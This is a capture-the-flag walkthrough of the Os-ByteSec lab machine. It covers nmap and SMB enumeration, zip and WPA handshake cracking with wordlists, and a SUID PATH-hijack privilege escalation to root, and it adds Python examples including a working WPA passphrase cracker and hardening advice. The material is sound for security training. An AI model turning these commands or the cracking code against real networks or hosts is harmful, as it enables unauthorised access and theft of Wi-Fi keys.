Os-ByteSec

$ sudo nmap -sP 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00044s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.22s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.101
Host is up (0.20s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.00022s latency).
MAC Address: 08:00:27:EA:22:6D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.105
Host is up (0.20s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.20s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.109
Host is up (0.0011s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 5.89 seconds

-sP (ping scan)
This option tells Nmap to do host discovery only and to print the hosts that responded; nothing further (no port scan, no OS detection) is done. In Nmap 7.92 `-sP` is a deprecated alias for `-sn` and is still accepted. It is more intrusive than a list scan (`-sL`) and is commonly used for the same purpose: it learns a little about the target network without drawing much attention, and to an attacker the number of hosts that are actually up is usually worth more than the list of IP addresses and hostnames a list scan produces.

System administrators like this option as well. It is a quick way to count the machines on a network or to check that a server is reachable. It is often called a ping sweep, and it is more reliable than pinging the broadcast address because many hosts do not answer broadcast requests.

Run as a privileged user, the default discovery probes are an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request. An unprivileged user cannot send raw packets, so Nmap instead sends SYNs with the connect() system call to ports 80 and 443. When a privileged user scans targets on the local Ethernet segment, ARP requests (-PR) are used instead unless --send-ip is given; that is what happened in the output above, which is why every host comes back with a MAC address and vendor. Two entries are worth reading off the list: 192.168.0.102 has an Oracle VirtualBox virtual NIC and is the target VM, and 192.168.0.104, reported up without latency or MAC address, is the scanning host itself. -sP can be combined with any of the -P* discovery probe types except -Pn (formerly -P0) for more flexibility, and as soon as any probe type or port option is given the default probes are replaced. Those options are worth using when a well-configured firewall sits between the scanning host and the target network; otherwise some hosts go undetected when the firewall drops the probes or the replies.
$ nmap -sV -sC -A 192.168.0.102
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CST
Nmap scan report for 192.168.0.102
Host is up (0.000056s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
|   256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_  256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -9h50m00s, deviation: 3h10m30s, median: -8h00m01s
| smb2-time: 
|   date: 2022-03-17T14:31:59
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: nitin
|   NetBIOS computer name: NITIN\x00
|   Domain name: 168.1.7
|   FQDN: nitin.168.1.7
|_  System time: 2022-03-17T20:01:59+05:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
-sV (version detection)
Enables version detection. -A also turns it on, together with the default script set (-sC) and, only when running as root, OS detection (-O) and traceroute; so `-sV -sC -A` says the same thing three times, which is harmless but redundant. This scan was not run as root (the `conn-refused` marker shows a connect scan), which is why no OS fingerprint or traceroute appears.
-sC runs the default NSE scripts appropriate to the service identified on each port.
What the results tell us: the host is Ubuntu 16.04 (Apache 2.4.18, OpenSSH 7.2p2 4ubuntu2.7 and Samba 4.3.11 are all xenial package versions), SSH has been moved to port 2525, and the "Windows 6.1" in smb-os-discovery is the Windows version Samba emulates on the wire, not the real operating system. Two SMB findings matter for what follows: the guest session succeeded (`account_used: guest`), so anonymous enumeration will work, and SMB1 message signing is disabled while SMB2/3 signing is enabled but not required, so SMB traffic to this server can be tampered with or relayed. On Samba the corresponding hardening is `server signing = mandatory` and `server min protocol = SMB2_02`.
    SMB (Server Message Block) originated at IBM in the early 1980s; Microsoft and Intel published a specification in 1987 and it became the native file- and print-sharing protocol of Microsoft networks. In OSI terms it spans the session and presentation layers and part of the application layer. It was built on the NetBIOS API, and its usual ports are TCP 139 and 445. It is an open, extensible protocol, and the extensions made it large and complex: dozens of top-level commands, some of them (the Transaction2 and NT Transact families) with many sub-commands each, not all of which even Windows NT implemented. Microsoft rebranded SMB 1.0 as CIFS (Common Internet File System) in 1996 and added features to it; SMB 2.0 (Windows Vista/Server 2008) and SMB 3.x (Windows 8/Server 2012 onward) have since replaced it, and "CIFS" now refers specifically to the old SMB1 dialect.
    SMB is a client/server protocol and is still running on the vast majority of PCs: every Windows system can act as both SMB client and SMB server. The server exposes shared resources to SMB clients over the network; historically the two could be connected over TCP/IP, IPX or NetBEUI, today over TCP/IP only.

    Shares are addressed by UNC path in two forms:
    ★ \\<IP address>\<share path>
    ★ \\<computer name>\<share path>
    Which TCP port is used depends on the transport, not on the name form: SMB carried over the NetBIOS session service (NBT) uses port 139, SMB directly over TCP uses port 445. Modern Windows clients try 445 first and fall back to 139 regardless of whether a name or an address was given; the name form only adds NetBIOS or DNS resolution beforehand. This host listens on both.
$ smbmap -H 192.168.0.102
[+] Guest session   	IP: 192.168.0.103:445	Name: 192.168.0.103                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (nitin server (Samba, Ubuntu))
SMBMap enumerates SMB shares across a whole domain: it lists shares and their permissions, walks share contents, uploads and downloads files, auto-downloads files matching a name pattern and can even execute commands remotely. It was designed to make hunting for potentially sensitive data on large networks faster. Note what the guest session above does not show: only print$ and IPC$ are returned, both NO ACCESS, while the share that is accessed later (smb) is absent from the anonymous listing. An unauthenticated share list is not exhaustive, which is why user enumeration is the next step.
$ ./enum4linux-ng.py -A -C 192.168.0.102  
ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 192.168.0.102
[*] Username ......... ''
[*] Random Username .. 'agujhpgm'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Service Scan on 192.168.0.102    |
 =====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    NetBIOS Names and Workgroup for 192.168.0.102    |
 =====================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- NITIN           <00> -         B <ACTIVE>  Workstation Service
- NITIN           <03> -         B <ACTIVE>  Messenger Service
- NITIN           <20> -         B <ACTIVE>  File Server Service
- ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
- WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
- WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
- WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 ==========================================
|    SMB Dialect Check on 192.168.0.102    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: false

 ==========================================
|    RPC Session Check on 192.168.0.102    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[+] Server allows session using username 'agujhpgm', password ''
[H] Rerunning enumeration with user 'agujhpgm' might give more results

 ====================================================
|    Domain Information via RPC for 192.168.0.102    |
 ====================================================
[+] Domain: WORKGROUP
[+] SID: NULL SID
[+] Host is part of a workgroup (not a domain)

 ============================================================
|    Domain Information via SMB session for 192.168.0.102    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: NITIN
NetBIOS domain name: ''
DNS domain: 168.1.7
FQDN: nitin.168.1.7

 ================================================
|    OS Information via RPC for 192.168.0.102    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 4.3.11-Ubuntu)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: Windows 6.1
Native LAN manager: Samba 4.3.11-Ubuntu
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT nitin server (Samba, Ubuntu)

 ======================================
|    Users via RPC on 192.168.0.102    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 1 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 users via 'enumdomusers'
[+] After merging user results we have 1 users total:
'1000':
  username: smb
  name: ''
  acb: '0x00000010'
  description: ''

 =======================================
|    Groups via RPC on 192.168.0.102    |
 =======================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 =========================================
|    Services via RPC on 192.168.0.102    |
 =========================================
[+] Found 4 service(s):
NETLOGON:
  description: Net Logon
RemoteRegistry:
  description: Remote Registry Service
Spooler:
  description: Print Spooler
WINS:
  description: Windows Internet Name Service (WINS)

 =======================================
|    Shares via RPC on 192.168.0.102    |
 =======================================
[*] Enumerating shares
[+] Found 2 share(s):
IPC$:
  comment: IPC Service (nitin server (Samba, Ubuntu))
  type: IPC
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A

 ==========================================
|    Policies via RPC for 192.168.0.102    |
 ==========================================
[*] Trying port 445/tcp
[+] Found policy:
domain_password_information:
  pw_history_length: None
  min_pw_length: 5
  min_pw_age: none
  max_pw_age: not set
  pw_properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
domain_lockout_information:
  lockout_observation_window: 30 minutes
  lockout_duration: 30 minutes
  lockout_threshold: None
domain_logoff_information:
  force_logoff_time: not set

 ==========================================
|    Printers via RPC for 192.168.0.102    |
 ==========================================
[+] No printers returned (this is not an error)

Completed after 0.48 seconds

enum4linux is a tool for enumerating information from Windows and Samba systems; it set out to offer what enum.exe (once available from www.bindview.com) offered on Windows. The original is written in Perl and is essentially a wrapper around the Samba command-line tools smbclient, rpcclient, net and nmblookup. enum4linux-ng, used above, is the Python rewrite with the same approach: -A performs all the simple enumeration steps (users, groups, shares, policies, OS information, nmblookup) and -C additionally lists services via RPC.
Three results from this run drive the rest of the attack: the server accepts a null session and a session for a random user name with an empty password (unknown users are mapped to guest); RPC user enumeration returns a single local account, smb (RID 1000); and the password policy sets a minimum length of 5 with no lockout threshold, so guessing passwords for that account cannot lock it out.
$ smbclient //192.168.0.102/smb -U smb
Enter WORKGROUP\smb's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Nov  4 19:50:37 2019
  ..                                  D        0  Mon Nov  4 19:37:28 2019
  main.txt                            N       10  Mon Nov  4 19:45:38 2019
  safe.zip                            N  3424907  Mon Nov  4 19:50:37 2019

  9204224 blocks of size 1024. 6825756 blocks available
smb: \> 

smbclient is the Samba client, an FTP-like tool that is useful for testing connections to Windows and Samba shares: it lists share names, transfers files with get/put, and its tar mode backs up a share to the client or restores it to the server. Having learnt the account name smb from the RPC enumeration, we connected as that user to the share of the same name, which did not appear in the anonymous share listing above (the password prompt is shown, the value entered is not). The share holds main.txt and safe.zip; `get safe.zip` downloads the archive for offline cracking.
$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip 

[safe.zip] secret.jpg password: 
  inflating: secret.jpg              
  inflating: user.cap       
fcrackzip is a small, fast password cracker for zip archives that runs on Linux and macOS and supports dictionary and charset (brute-force) modes. In the command above -D selects dictionary mode, -p names the wordlist (in dictionary mode -p takes a file rather than a starting string) and -u makes it confirm each hit with unzip, which weeds out the false positives of the fast check. On success it prints `PASSWORD FOUND!!!!: pw == <password>`; the prompt and `inflating:` lines shown above come from the subsequent unzip of the archive, which yields secret.jpg and user.cap, a packet capture.
$ sudo aircrack-ng user.cap
Reading packets, please wait...
Opening user.cap
Read 49683 packets.

   #  BSSID              ESSID                     Encryption

   1  56:DC:1D:19:52:BC  blackjax                  WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening user.cap
Read 49683 packets.

1 potential targets

Please specify a dictionary (option -w).

$ sudo aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt  
Reading packets, please wait...
Opening user.cap
Read 49683 packets.

   #  BSSID              ESSID                     Encryption

   1  56:DC:1D:19:52:BC  blackjax                  WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening user.cap
Read 49683 packets.

1 potential targets



                               Aircrack-ng 1.6 

      [00:00:00] 1424/10303727 keys tested (18424.54 k/s) 

      Time left: 9 minutes, 19 seconds                           0.01%

                           KEY FOUND! [ snowflake ]


      Master Key     : 88 D4 8C 29 79 BF DF 88 B4 14 0F 5A F3 E8 FB FB 
                       59 95 91 7F ED 3E 93 DB 2A C9 BA FB EE 07 EA 62 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : ED B5 F7 D9 56 98 B0 5E 25 7D 86 08 C4 D4 02 3D 
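The key aircrack-ng reports above is the result of a purely offline computation, and the following added example (mine, not the write-up's) carries it out so that the "Master Key" and "Transient Key" lines have a meaning. For WPA/WPA2-Personal the Pairwise Master Key is PBKDF2-HMAC-SHA1 of the passphrase with the SSID as salt (4096 rounds, 256 bits); the Pairwise Transient Key is derived from the PMK, both MAC addresses and both nonces; and a candidate passphrase is confirmed by recomputing the MIC of handshake message 2 with the first 16 bytes of the PTK (the KCK). Because user.cap is not on the page, the handshake below is constructed: the client MAC, the nonces and the EAPOL-Key frame are made up, while the BSSID and ESSID are the ones printed above. All function and variable names are mine.

```python
# Added example (not from the write-up): the computation aircrack-ng performs for every
# candidate passphrase while "testing keys" against the WPA handshake in user.cap.
import hashlib
import hmac
import struct
from typing import Iterable, Optional

PMK_ROUNDS, PMK_LEN = 4096, 32
MIC_OFFSET = 81  # 802.1X hdr(4)+desc type(1)+key info(2)+key len(2)+replay(8)+nonce(32)+IV(16)+RSC(8)+ID(8)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK-to-PMK mapping from IEEE 802.11: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    This is what aircrack-ng prints as 'Master Key'; the 4096 rounds are the per-guess cost."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode(), PMK_ROUNDS, PMK_LEN)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    """802.11 PRF-n(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    48 bytes for CCMP (KCK 16 | KEK 16 | TK 16); aircrack-ng prints this as 'Transient Key'."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for key-descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the EAPOL-Key frame
    with its MIC field zeroed. Version 1 (WPA/TKIP) uses HMAC-MD5 in the same position."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: Optional[bytes] = None) -> bytes:
    """Constructed handshake message 2 (supplicant -> AP) with the real EAPOL-Key layout; not
    taken from user.cap. If a KCK is given the MIC is filled in, as a real supplicant would."""
    key_info = 0x010A  # descriptor version 2 | pairwise | Key MIC bit
    body = struct.pack(">BHH", 2, key_info, 16) + b"\x00" * 8 + snonce   # type, info, key len, replay, nonce
    body += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16       # IV, RSC, ID, MIC placeholder
    body += struct.pack(">H", 0)                                          # empty key data
    frame = struct.pack(">BBH", 2, 3, len(body)) + body                   # 802.1X v2, type 3 = EAPOL-Key
    if kck is not None:
        frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return frame


def crack_handshake(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                    msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Per candidate: PMK -> PTK -> KCK, recompute the MIC of message 2 and compare it with the
    captured one. Only the PBKDF2 step is expensive, which is why GPU crackers precompute PMKs per SSID."""
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:
            continue  # cannot be a WPA passphrase; aircrack-ng skips these as well
        kck = derive_ptk(derive_pmk(word, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured):
            return word
    return None


if __name__ == "__main__":
    ssid, passphrase = "blackjax", "snowflake"            # ESSID and recovered key from the output above
    print("PMK:", derive_pmk(passphrase, ssid).hex())      # compare with aircrack-ng's 'Master Key' line
    aa = bytes.fromhex("56dc1d1952bc")                     # BSSID from the output above
    spa, anonce, snonce = bytes.fromhex("020000000001"), bytes(range(32)), bytes(range(32, 64))  # constructed
    msg2 = build_msg2(snonce, derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16])
    print("recovered:", crack_handshake(ssid, aa, spa, anonce, snonce, msg2,
                                        ["password", "letmein1", "snowflake", "qwerty123"]))
```

Run it and compare the printed PMK for snowflake/blackjax with the Master Key line above. The 4096 HMAC-SHA1 rounds per guess are what limited the cracker to roughly 18k keys/s on a CPU and would have made the full rockyou.txt (about 10.3 million lines) a nine-minute job, as the progress line shows.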

$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g

This command lists the SUID-root executables on the system. Starting from /, find prints files owned by root (-user root) whose setuid bit is set (-perm -4000: that bit must be set, the other mode bits are ignored), and 2>/dev/null discards the permission-denied errors for directories the current user cannot read, so the list covers only paths this user can traverse. Everything shown is a stock Ubuntu 16.04 binary except /usr/bin/netscan, which is not part of the distribution and is therefore the one to examine first: `dpkg -S /usr/bin/netscan` shows whether any package owns it, and `strings /usr/bin/netscan` shows which helper programs it invokes and whether it does so by bare name.
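The listing above only becomes useful once the unexpected entry is isolated. The following added example (mine, not the write-up's) does that triage in Python: it diffs the listing against a baseline of the SUID-root binaries a stock Ubuntu 16.04 install has (assembled here from the page's own output with netscan removed, which is an assumption; on a real job take it from a clean install of the same release), asks dpkg which package owns each outlier, and extracts printable strings from the outlier to flag invocations of helper programs by bare name, which is exactly the weakness the next step exploits. Function names and the sample binary blob used for testing are mine.

```python
# Added example (not from the write-up): triage for a SUID-root listing like the one above.
# It (1) diffs the listing against a baseline of binaries expected on the distribution,
# (2) asks dpkg which package owns each outlier, and (3) pulls printable strings out of
# the outlier and flags ones that look like a helper program invoked by bare name.
import os
import re
import shutil
import subprocess
from typing import FrozenSet, Iterable, List, Optional

# Baseline: the listing above minus the one binary that is not stock Ubuntu 16.04 (assumption;
# on an engagement generate this from a clean install of the same release, not by hand).
UBUNTU_1604_SUID_BASELINE: FrozenSet[str] = frozenset({
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/snapd/snap-confine",
    "/usr/lib/i386-linux-gnu/lxc/lxc-user-nic", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/newgidmap", "/usr/bin/gpasswd", "/usr/bin/newuidmap", "/usr/bin/chfn",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/pkexec", "/usr/bin/newgrp", "/usr/bin/sudo",
    "/bin/ping6", "/bin/fusermount", "/bin/mount", "/bin/su", "/bin/ping", "/bin/umount",
    "/bin/ntfs-3g",
})

# The find output from the page, embedded as sample input so this runs offline.
SAMPLE_FIND_OUTPUT = """\
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g
"""


def suid_outliers(listing: Iterable[str], baseline: FrozenSet[str] = UBUNTU_1604_SUID_BASELINE) -> List[str]:
    """Paths in a `find / -user root -perm -4000` listing that the baseline does not explain."""
    return sorted({line.strip() for line in listing if line.strip()} - baseline)


def owning_package(path: str) -> Optional[str]:
    """Package that owns `path` according to dpkg -S, or None if none does (or dpkg is absent).
    A SUID-root binary no package owns was put there by hand and deserves a close look."""
    if shutil.which("dpkg") is None:
        return None
    proc = subprocess.run(["dpkg", "-S", path], capture_output=True, text=True)
    return proc.stdout.split(":", 1)[0] if proc.returncode == 0 else None


PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")   # what `strings` extracts by default (min length 4)
PROGRAM_NAME = re.compile(r"[a-z][a-z0-9_.-]*")


def bare_command_strings(blob: bytes, known_helpers: Optional[FrozenSet[str]] = None) -> List[str]:
    """Strings whose first word is a program named without a path, e.g. 'netstat -antp': the
    signature of system()/popen() calls that can be hijacked through PATH. By default a word
    counts as a program if it resolves on this machine's PATH; pass known_helpers for
    reproducible results."""
    hits = []
    for match in PRINTABLE.finditer(blob):
        words = match.group().decode("ascii").split()
        if not words or words[0].startswith("/") or not PROGRAM_NAME.fullmatch(words[0]):
            continue
        is_program = words[0] in known_helpers if known_helpers is not None else shutil.which(words[0])
        if is_program:
            hits.append(" ".join(words))
    return hits


if __name__ == "__main__":
    for path in suid_outliers(SAMPLE_FIND_OUTPUT.splitlines()):   # -> /usr/bin/netscan
        print(path, "owned by:", owning_package(path) or "no package")
        if os.path.exists(path):                                   # only meaningful on the target itself
            with open(path, "rb") as f:
                for s in bare_command_strings(f.read()):
                    print("  bare-name helper call:", s)
```

On the target, the last loop is the check that tells you whether netscan is exploitable the way the next step exploits it: a string such as `netstat -antp` with no leading slash means the helper is resolved through the caller's PATH.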

$ cd /tmp
$ ls
systemd-private-250c4f6c088441de8cc92f48f42a5fb7-systemd-timesyncd.service-XfmVb5
$ echo "/bin/sh" > netstat
$ chmod 777 netstat 
$ echo $PATH 
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
$ export PATH=/tmp:$PATH
$ cd /usr/bin 
$ ./netscan
# cat /root/root.txt
    ____  ____  ____  ______   ________    ___   ______
   / __ \/ __ \/ __ \/_  __/  / ____/ /   /   | / ____/
  / /_/ / / / / / / / / /    / /_  / /   / /| |/ / __  
 / _, _/ /_/ / /_/ / / /    / __/ / /___/ ___ / /_/ /  
/_/ |_|\____/\____/ /_/____/_/   /_____/_/  |_\____/   
                     /_____/                           
Conguratulation..

MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Author : Rahul Gehlaut

Contact : https://www.linkedin.com/in/rahulgehlaut/

WebSite : jameshacker.me
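The last steps above are a PATH hijack, which the page does not explain. /usr/bin/netscan is SUID root and, as the root shell shows, invokes netstat by bare name, i.e. something like system("netstat ...") in C, which is /bin/sh -c "netstat ..." underneath. The shell resolves a bare name through $PATH, and an unprivileged caller controls $PATH: when a setuid binary starts, the dynamic loader ignores LD_PRELOAD and LD_LIBRARY_PATH, but PATH is passed through untouched. So the attacker writes a file called netstat into a writable directory, puts that directory first in PATH and runs netscan; the privileged process then executes the attacker's netstat. The file here contained only the text /bin/sh with no shebang, so execve fails with ENOEXEC and the shell falls back to interpreting the file as a script, which starts /bin/sh with effective uid 0. chmod 777 is more than needed (the execute bit is enough), and running ./netscan from /usr/bin changes nothing; what matters is the PATH the SUID process inherits. The following added example (mine, not the write-up's) reproduces the primitive without privileges next to the call pattern that defeats it; the marker-printing stand-ins for netstat and the directory names are constructed.

```python
# Added example (not from the write-up): the PATH-hijack primitive used against
# /usr/bin/netscan, reproduced without root, next to the call pattern that defeats it.
# The stand-in helpers only print a marker; nothing here needs or grants privileges.
import os
import shutil
import subprocess
import tempfile
from typing import Dict

SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def make_sandbox() -> Dict[str, str]:
    """Constructed stand-ins: <root>/legit/netstat plays /bin/netstat, <root>/tmp/netstat plays the
    attacker's /tmp/netstat. Each prints a marker instead of doing anything."""
    root = tempfile.mkdtemp(prefix="pathhijack-")
    dirs = {"root": root}
    for sub, marker in (("legit", "LEGIT"), ("tmp", "HIJACKED")):
        d = os.path.join(root, sub)
        os.mkdir(d)
        helper = os.path.join(d, "netstat")
        with open(helper, "w") as f:
            f.write("#!/bin/sh\necho %s\n" % marker)
        os.chmod(helper, 0o755)  # the write-up's chmod 777 is more than needed
        dirs[sub] = d
    return dirs


def attacker_env(writable_dir: str) -> Dict[str, str]:
    """Environment after `export PATH=/tmp:$PATH`: the attacker's directory is searched first."""
    env = dict(os.environ)
    env["PATH"] = writable_dir + os.pathsep + env.get("PATH", SAFE_PATH)
    return env


def vulnerable_netscan(env: Dict[str, str]) -> str:
    """The pattern netscan evidently uses: system("netstat") is /bin/sh -c "netstat", and the
    shell resolves the bare name through whatever PATH it inherited from the caller."""
    proc = subprocess.run("netstat", shell=True, env=env, capture_output=True, text=True)
    return proc.stdout.strip()


def hardened_netscan(_env: Dict[str, str], trusted_bin: str) -> str:
    """Fixed pattern: absolute path, no shell, and a fixed PATH. The caller's environment is
    deliberately ignored, so nothing it sets can redirect the lookup. (Better still: no SUID at all.)"""
    proc = subprocess.run([os.path.join(trusted_bin, "netstat")], env={"PATH": SAFE_PATH},
                          capture_output=True, text=True)
    return proc.stdout.strip()


def cleanup(dirs: Dict[str, str]) -> None:
    shutil.rmtree(dirs["root"], ignore_errors=True)


if __name__ == "__main__":
    sandbox = make_sandbox()
    env = attacker_env(sandbox["tmp"])
    print("vulnerable:", vulnerable_netscan(env))                  # HIJACKED
    print("hardened:  ", hardened_netscan(env, sandbox["legit"]))  # LEGIT
    cleanup(sandbox)
```

The same two lines of defence apply to the real binary: call helpers by absolute path (or set PATH to a fixed value before any system()/popen()/execvp()), and do not give a network-scanning utility the setuid bit in the first place; if it needs raw sockets, a file capability such as cap_net_raw is far less than uid 0.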